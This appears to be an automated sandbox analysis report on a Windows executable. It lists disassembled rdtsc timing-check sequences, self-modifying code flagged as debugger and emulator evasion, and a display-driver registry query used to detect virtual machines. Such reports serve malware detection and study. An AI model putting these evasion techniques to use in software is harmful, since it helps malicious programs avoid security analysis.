                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0A78 second address: 4DE000A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, si 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FEB1CC19F82h 0x00000012 adc ax, 4F58h 0x00000017 jmp 00007FEB1CC19F7Bh 0x0000001c popfd 0x0000001d movzx esi, bx 0x00000020 popad 0x00000021 leave 0x00000022 pushad 0x00000023 mov cx, bx 0x00000026 mov ebx, 5AE656A0h 0x0000002b popad 0x0000002c retn 0004h 0x0000002f nop 0x00000030 sub esp, 04h 0x00000033 xor ebx, ebx 0x00000035 cmp eax, 00000000h 0x00000038 je 00007FEB1CC1A0DAh 0x0000003e mov dword ptr [esp], 0000000Dh 0x00000045 call 00007FEB21026111h 0x0000004a mov edi, edi 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f push ecx 0x00000050 pop edx 0x00000051 pushad 0x00000052 popad 0x00000053 popad 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE000A second address: 4DE0010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0010 second address: 4DE0014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0014 second address: 4DE0029 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushad 0x0000000b mov edi, esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov ebx, 1AA481F6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0029 second address: 4DE0071 instructions: 0x00000000 rdtsc 0x00000002 call 00007FEB1CC19F87h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007FEB1CC19F7Fh 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FEB1CC19F85h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0071 second address: 4DE0078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0078 second address: 4DE00A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 sub esp, 2Ch 0x0000000a pushad 0x0000000b mov esi, 31083AA7h 0x00000010 popad 0x00000011 xchg eax, ebx 0x00000012 jmp 00007FEB1CC19F7Ah 0x00000017 push eax 0x00000018 jmp 00007FEB1CC19F7Bh 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE00A8 second address: 4DE00AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE00AD second address: 4DE00D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, D8h 0x00000005 call 00007FEB1CC19F7Fh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 mov eax, 00025981h 0x00000015 push eax 0x00000016 push edx 0x00000017 mov dh, ah 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE00D0 second address: 4DE0112 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEB1C7EA9E9h 0x00000008 sbb ax, 2386h 0x0000000d jmp 00007FEB1C7EA9E1h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov dword ptr [esp], edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov si, dx 0x0000001f mov ecx, edx 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE013C second address: 4DE0175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 jmp 00007FEB1CC19F7Ch 0x0000000b pop esi 0x0000000c popad 0x0000000d mov ebx, 00000000h 0x00000012 pushad 0x00000013 call 00007FEB1CC19F7Ch 0x00000018 movzx eax, dx 0x0000001b pop edx 0x0000001c movzx eax, di 0x0000001f popad 0x00000020 mov edi, 00000000h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0175 second address: 4DE0186 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0186 second address: 4DE01D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ebx 0x0000000a jmp 00007FEB1CC19F7Eh 0x0000000f test al, al 0x00000011 jmp 00007FEB1CC19F80h 0x00000016 je 00007FEB1CC1A14Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FEB1CC19F7Ah 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE01D0 second address: 4DE01D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE01D4 second address: 4DE01DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE01DA second address: 4DE01E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE01E0 second address: 4DE022B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea ecx, dword ptr [ebp-14h] 0x0000000b pushad 0x0000000c mov edx, ecx 0x0000000e mov ecx, 192D7D4Dh 0x00000013 popad 0x00000014 mov dword ptr [ebp-14h], edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FEB1CC19F85h 0x00000020 xor cx, 23D6h 0x00000025 jmp 00007FEB1CC19F81h 0x0000002a popfd 0x0000002b mov di, ax 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE02A8 second address: 4DE02D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FEB1C7EA9E2h 0x0000000e popad 0x0000000f test eax, eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE02D7 second address: 4DE02DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE02DB second address: 4DE02F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE02F8 second address: 4DE02FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE02FE second address: 4DE0302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0302 second address: 4DE0306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0306 second address: 4DE0319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FEB8D4A8B54h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ecx, ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0319 second address: 4DE03C5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEB1CC19F87h 0x00000008 or ch, 0000004Eh 0x0000000b jmp 00007FEB1CC19F89h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov ch, 95h 0x00000015 popad 0x00000016 js 00007FEB1CC19FB4h 0x0000001c jmp 00007FEB1CC19F83h 0x00000021 cmp dword ptr [ebp-14h], edi 0x00000024 jmp 00007FEB1CC19F86h 0x00000029 jne 00007FEB8D8D808Ah 0x0000002f pushad 0x00000030 jmp 00007FEB1CC19F7Ah 0x00000035 popad 0x00000036 mov ebx, dword ptr [ebp+08h] 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007FEB1CC19F7Dh 0x00000042 xor ch, 00000046h 0x00000045 jmp 00007FEB1CC19F81h 0x0000004a popfd 0x0000004b mov ebx, ecx 0x0000004d popad 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE04CA second address: 4DE0506 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FEB1C7EA9E0h 0x0000000c xor al, FFFFFFE8h 0x0000000f jmp 00007FEB1C7EA9DBh 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FEB1C7EA9E0h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0506 second address: 4DE050C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DD07A8 second address: 4DD083A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FEB1C7EA9E6h 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FEB1C7EA9DEh 0x00000018 sbb al, FFFFFFF8h 0x0000001b jmp 00007FEB1C7EA9DBh 0x00000020 popfd 0x00000021 push esi 0x00000022 pushfd 0x00000023 jmp 00007FEB1C7EA9DFh 0x00000028 add ax, CCBEh 0x0000002d jmp 00007FEB1C7EA9E9h 0x00000032 popfd 0x00000033 pop esi 0x00000034 popad 0x00000035 mov ebp, esp 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FEB1C7EA9E9h 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DD083A second address: 4DD083E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DD083E second address: 4DD0844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DD0844 second address: 4DD0859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ah 0x00000005 mov bl, 7Dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, bx 0x00000011 mov si, bx 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DD0859 second address: 4DD0898 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEB1C7EA9DBh 0x0000000f xchg eax, ecx 0x00000010 pushad 0x00000011 mov edx, esi 0x00000013 popad 0x00000014 mov dword ptr [ebp-04h], 55534552h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FEB1C7EA9DFh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DD0898 second address: 4DD089C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DD089C second address: 4DD08A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0A14 second address: 4DE0A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEB1CC19F84h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0A74 second address: 4DE0A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0A7A second address: 4DE0A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0A7E second address: 4DE0AC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FEB1C7EA9DBh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FEB1C7EA9E9h 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0AC0 second address: 4DE0B30 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEB1CC19F84h 0x00000008 adc eax, 501D9BB8h 0x0000000e jmp 00007FEB1CC19F7Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c call 00007FEB1CC19F7Bh 0x00000021 pushfd 0x00000022 jmp 00007FEB1CC19F88h 0x00000027 sub si, 7548h 0x0000002c jmp 00007FEB1CC19F7Bh 0x00000031 popfd 0x00000032 pop esi 0x00000033 popad 0x00000034 pop eax 0x00000035 pushad 0x00000036 movsx edx, cx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0B30 second address: 4DE0B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, 7Bh 0x00000006 popad 0x00000007 popad 0x00000008 call 00007FEB8D49FA10h 0x0000000d push 75A92B70h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov eax, dword ptr [esp+10h] 0x0000001d mov dword ptr [esp+10h], ebp 0x00000021 lea ebp, dword ptr [esp+10h] 0x00000025 sub esp, eax 0x00000027 push ebx 0x00000028 push esi 0x00000029 push edi 0x0000002a mov eax, dword ptr [75AF4538h] 0x0000002f xor dword ptr [ebp-04h], eax 0x00000032 xor eax, ebp 0x00000034 push eax 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 push dword ptr [ebp-08h] 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000045 mov dword ptr [ebp-08h], eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 ret 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 mov edx, ecx 0x00000057 pushfd 0x00000058 jmp 00007FEB1C7EA9DAh 0x0000005d or cl, FFFFFFD8h 0x00000060 jmp 00007FEB1C7EA9DBh 0x00000065 popfd 0x00000066 popad 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0B5D second address: 4DE0B65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0BB6 second address: 4DE0C03 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEB1C7EA9E8h 0x00000008 sub cl, FFFFFFF8h 0x0000000b jmp 00007FEB1C7EA9DBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jmp 00007FEB1C7EA9E8h 0x00000018 popad 0x00000019 test al, al 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0C03 second address: 4DE0C20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0C20 second address: 4DE0C30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEB1C7EA9DCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0C30 second address: 4DE0C34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0C34 second address: 4DE0C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FEB8D48E71Fh 0x0000000e pushad 0x0000000f movsx edx, ax 0x00000012 push eax 0x00000013 push edx 0x00000014 mov ax, A4FBh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0AFD second address: 4DF0B03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0B03 second address: 4DF0B09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0B09 second address: 4DF0B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0B0D second address: 4DF0B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FEB1C7EA9E1h 0x00000013 and esi, 5ECEB716h 0x00000019 jmp 00007FEB1C7EA9E1h 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0B46 second address: 4DF0B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0B4B second address: 4DF0BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, bx 0x00000010 pushfd 0x00000011 jmp 00007FEB1C7EA9E7h 0x00000016 add cx, DDAEh 0x0000001b jmp 00007FEB1C7EA9E9h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0BA5 second address: 4DF0C46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEB1CC19F87h 0x00000009 or eax, 1C2213BEh 0x0000000f jmp 00007FEB1CC19F89h 0x00000014 popfd 0x00000015 call 00007FEB1CC19F80h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f jmp 00007FEB1CC19F80h 0x00000024 xchg eax, esi 0x00000025 pushad 0x00000026 mov bh, cl 0x00000028 pushfd 0x00000029 jmp 00007FEB1CC19F83h 0x0000002e or si, B32Eh 0x00000033 jmp 00007FEB1CC19F89h 0x00000038 popfd 0x00000039 popad 0x0000003a mov esi, dword ptr [ebp+0Ch] 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0C46 second address: 4DF0C59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0C59 second address: 4DF0C5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0C5F second address: 4DF0C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0C63 second address: 4DF0C7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0C7C second address: 4DF0C97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0C97 second address: 4DF0CE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushfd 0x00000007 jmp 00007FEB1CC19F7Bh 0x0000000c or ax, 23FEh 0x00000011 jmp 00007FEB1CC19F89h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007FEB8D8B7662h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FEB1CC19F7Dh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0CE0 second address: 4DF0D02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75AF459Ch], 05h 0x00000010 pushad 0x00000011 movzx esi, dx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0D02 second address: 4DF0D2D instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 je 00007FEB8D8CF703h 0x0000000e jmp 00007FEB1CC19F7Dh 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FEB1CC19F7Dh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0D2D second address: 4DF0D64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FEB1C7EA9DAh 0x00000012 call 00007FEB1C7EA9E2h 0x00000017 pop ecx 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0D64 second address: 4DF0D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEB1CC19F87h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0D7F second address: 4DF0DBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007FEB1C7EA9DAh 0x00000015 or si, 8E08h 0x0000001a jmp 00007FEB1C7EA9DBh 0x0000001f popfd 0x00000020 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSpecial instruction interceptor: First address: 9F8FD5 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSpecial instruction interceptor: First address: 9F88E2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSpecial instruction interceptor: First address: BBEDC7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSpecial instruction interceptor: First address: 9F881F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSpecial instruction interceptor: First address: C1EBD9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
